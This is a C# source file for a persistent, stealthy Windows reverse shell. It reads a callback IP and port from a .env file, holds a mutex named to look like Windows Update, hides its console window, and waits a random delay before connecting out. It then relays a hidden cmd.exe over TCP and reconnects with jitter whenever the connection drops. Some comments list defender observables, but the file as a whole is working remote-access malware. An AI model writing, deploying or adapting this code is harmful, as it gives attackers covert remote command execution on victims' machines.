shell.cs
// This code is meant to create a persistent reverse shell over TCP on Windows. Developed on Debian.
// -https://github.com/EamonnPatt/custom-reverse-shell
using System;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Threading;
using System.Runtime.InteropServices;
// Minimal reader for KEY=VALUE lines in a ".env" file located in the process's
// current working directory.
class Config {
    // Returns the text after "key=" on the first line that starts with that prefix,
    // or null when the file is absent or no line matches. The value is returned
    // verbatim: no trimming, no quote stripping, no comment handling.
    public static string GetEnvVariable(string key) {
        const string path = ".env";

        // Guard clause: without the file there is nothing to look up.
        if (!File.Exists(path)) {
            return null;
        }

        string[] entries = File.ReadAllLines(path);
        for (int i = 0; i < entries.Length; i++) {
            string entry = entries[i];
            bool matches = entry.StartsWith(key + "=");
            if (matches) {
                // Skip the key and the '=' separator; everything after is the value.
                return entry.Substring(key.Length + 1);
            }
        }

        return null;
    }
}
// Entry point (Main) and callback loop (ConnectBack) of the reverse shell named in the file header.
// Observables a defender can take from the code below:
//   - a named mutex "Global\WindowsUpdateService" held for the life of the process;
//   - a ".env" file in the working directory holding the callback host ("localIP") and port ("myPORT");
//   - a console process that hides its own window and then spawns cmd.exe with all three
//     standard handles redirected while it holds an outbound TCP connection;
//   - reconnect attempts spaced 30-90 seconds apart while the remote endpoint is unreachable;
//   - an unencrypted, unauthenticated line-based channel (plain TcpClient stream), so commands
//     and their output are readable by network inspection.
class Program {
// Callback endpoint; assigned once in Main from the .env file and read by ConnectBack.
private static string ip;
private static int port;
// Win32 imports used only to hide this process's console window.
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll")]
static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);
[DllImport("user32.dll")]
static extern int GetWindowLong(IntPtr hWnd, int nIndex);
// ShowWindow command that hides the window.
const int SW_HIDE = 0;
// Index of the extended window style for Get/SetWindowLong.
const int GWL_EXSTYLE = -20;
// Extended styles: TOOLWINDOW keeps a window off the taskbar, APPWINDOW forces it onto the taskbar.
const int WS_EX_TOOLWINDOW = 0x00000080;
const int WS_EX_APPWINDOW = 0x00040000;
// Reads the endpoint, enforces single-instance via the mutex, hides the console window,
// waits a random interval, starts ConnectBack on a background thread, then blocks forever.
static void Main(string[] args) {
// Load environment variables first
// GetEnvVariable returns null when .env or the key is missing; int.Parse then throws,
// and nothing here catches it, so the process exits before any of the steps below.
ip = Config.GetEnvVariable("localIP");
port = int.Parse(Config.GetEnvVariable("myPORT"));
// Check if already running (prevent multiple instances)
// The "Global\" prefix puts the mutex in the machine-wide namespace; createdNew is false
// when another process already created it. The fixed name is a host-based indicator.
// NOTE(review): the name appears chosen to resemble a Windows component.
bool createdNew;
using (var mutex = new System.Threading.Mutex(true, "Global\\WindowsUpdateService", out createdNew)) {
if (!createdNew) {
return; // Already running, exit silently
}
// Hide everything
// Hides the console window this process owns.
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
// Sets TOOLWINDOW and clears APPWINDOW on the console window; any failure is ignored.
try {
int exStyle = GetWindowLong(handle, GWL_EXSTYLE);
exStyle |= WS_EX_TOOLWINDOW;
exStyle &= ~WS_EX_APPWINDOW;
SetWindowLong(handle, GWL_EXSTYLE, exStyle);
} catch { }
// Lower process priority to avoid detection
// This only changes the scheduling priority class to BelowNormal; failures are ignored.
try {
Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.BelowNormal;
} catch { }
// Random delay before connecting (0-60 seconds)
// Random.Next's upper bound is exclusive, so the sleep is 0..59999 ms.
Random rand = new Random();
Thread.Sleep(rand.Next(0, 60000));
// Run connection in background
Thread backgroundThread = new Thread(ConnectBack);
backgroundThread.IsBackground = true;
backgroundThread.Start();
// The main thread never leaves the using block, so the mutex stays held until the process ends.
Thread.Sleep(Timeout.Infinite);
}
}
// Loops forever: opens a TCP connection to ip:port, starts cmd.exe with redirected
// stdin/stdout/stderr, and relays lines in both directions until the peer closes the stream.
static void ConnectBack() {
Random rand = new Random();
while (true) {
try {
using (TcpClient client = new TcpClient(ip, port)) {
using (Stream stream = client.GetStream()) {
using (StreamReader reader = new StreamReader(stream)) {
using (StreamWriter writer = new StreamWriter(stream)) {
writer.AutoFlush = true;
// Child shell with no window and all standard handles redirected to this process.
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.CreateNoWindow = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardInput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
// Each stdout line from cmd.exe is written to the socket; write failures are swallowed.
process.OutputDataReceived += (s, e) => {
if (e.Data != null) {
try { writer.WriteLine(e.Data); } catch { }
}
};
// stderr is relayed the same way, through the same writer as stdout.
process.ErrorDataReceived += (s, e) => {
if (e.Data != null) {
try { writer.WriteLine(e.Data); } catch { }
}
};
process.Start();
process.BeginOutputReadLine();
process.BeginErrorReadLine();
// Every line received from the socket is passed to cmd.exe's stdin unchanged.
// ReadLine returns null at end of stream, which ends the session.
while (true) {
string cmd = reader.ReadLine();
if (cmd == null) break;
process.StandardInput.WriteLine(cmd);
}
// Terminates the child shell when the session ends; the Process object itself is not disposed.
try { process.Kill(); } catch { }
}
}
}
}
// Reaching this point means the session ended without an exception; the outer loop
// reconnects immediately, because the delay below runs only in the catch path.
} catch {
// Random delay between 30-90 seconds before retry
// Any exception (connect failure, broken stream, process start failure) lands here;
// the sleep is 30000..89999 ms because the upper bound is exclusive.
Thread.Sleep(rand.Next(30000, 90000));
}
}
}
}